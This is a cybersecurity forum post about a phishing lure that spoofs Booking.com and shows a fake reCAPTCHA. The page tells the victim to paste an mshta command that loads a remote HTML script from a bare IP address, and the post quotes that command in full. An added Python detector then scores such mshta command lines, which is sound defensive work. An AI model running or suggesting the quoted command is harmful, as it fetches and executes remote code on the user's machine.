this post was submitted on 19 Nov 2024
 
The original post: /r/cybersecurity by /u/wound_dear on 2024-11-19 14:15:22.

My hotel email recently got an interesting phishing attempt. It contained a link spoofed to look like a genuine Booking.com link. When loading the site, a fake reCAPTCHA box loads with instructions to open the Run program on Windows, hit CTRL+V, and hit Enter. The clipboard is loaded with this command:

mshta http://185.147.124.40/Capcha.html # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3781''

I thought this was an interesting attack. The real interesting thing, though, is the script loaded in on the IP's "Capcha.html" file, which I've put in an (unlisted) pastebin here.

I can recognize this is obfuscated code, but I have no idea how to crack this any further. Also, I feel like having an unshielded IP address is kind of a liability, no?
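
A defender-side way to spot the paste-and-run command described in the post, as an added example that is not part of the original post: it scores mshta invocations that are handed a remote URL, with extra weight for a bare-IP host and for verification-style text after the URL. Input is assumed to be command lines taken from process-creation logging or from Run-dialog history (RunMRU); the weights, threshold, and sample lines are constructed for illustration.

```python
import re

# Program is mshta (bare, with a path, with .exe, optionally quoted); the rest is its arguments.
MSHTA = re.compile(r'(?i)(?:^|[\\/\s"])mshta(?:\.exe)?"?\s+(?P<args>.+)$')
# First argument is a remote http(s) URL rather than a local .hta path.
REMOTE_URL = re.compile(r'(?i)^"?(?P<url>https?://[^\s"]+)"?')
# Host part is a bare IPv4 address, as in the command quoted in the post.
IP_HOST = re.compile(r'(?i)^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)')
# Human-readable padding after the URL: the only part a victim reads in the Run box.
LURE = re.compile(r'(?i)captcha|not a robot|verif|\u2705')

def score_command(cmdline):
    """Score one command line; returns (score, reasons), score 0 meaning no match."""
    text = cmdline.strip()
    if text.endswith('\\1'):          # RunMRU registry values carry a trailing \1
        text = text[:-2].rstrip()
    m = MSHTA.search(text)
    if not m:
        return 0, []
    args = m.group('args').strip()
    u = REMOTE_URL.match(args)
    if not u:
        return 0, []
    score, reasons = 2, ['mshta given a remote URL']
    if IP_HOST.match(u.group('url')):
        score, reasons = score + 1, reasons + ['host is a bare IP address']
    if LURE.search(args[u.end():]):
        score, reasons = score + 2, reasons + ['verification lure text after the URL']
    return score, reasons

def triage(cmdlines, threshold=3):
    """Return (score, cmdline, reasons) for lines at or above threshold, highest first."""
    hits = [(s, c, r) for c in cmdlines for s, r in [score_command(c)] if s >= threshold]
    return sorted(hits, key=lambda h: -h[0])

# Constructed sample command lines (documentation-range IP, example.com); not real telemetry.
SAMPLES = [
    "mshta http://192.0.2.10/Capcha.html # \u2705 ''I am not a robot - reCAPTCHA Verification ID: 0000''",
    r'"C:\Windows\System32\mshta.exe" https://intranet.example.com/tool.hta',
    r'C:\Windows\System32\mshta.exe "C:\Apps\inventory.hta"',
    r"mshta http://192.0.2.10/x.hta\1",
    "notepad.exe C:\\Users\\frontdesk\\captcha-notes.txt",
]

if __name__ == '__main__':
    for score, cmd, reasons in triage(SAMPLES):
        print(score, '; '.join(reasons), '|', cmd)
```

The text after the "#" does nothing for mshta; it exists so that the visible part of the Run box looks like a verification message, which is why it is scored separately from the URL.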
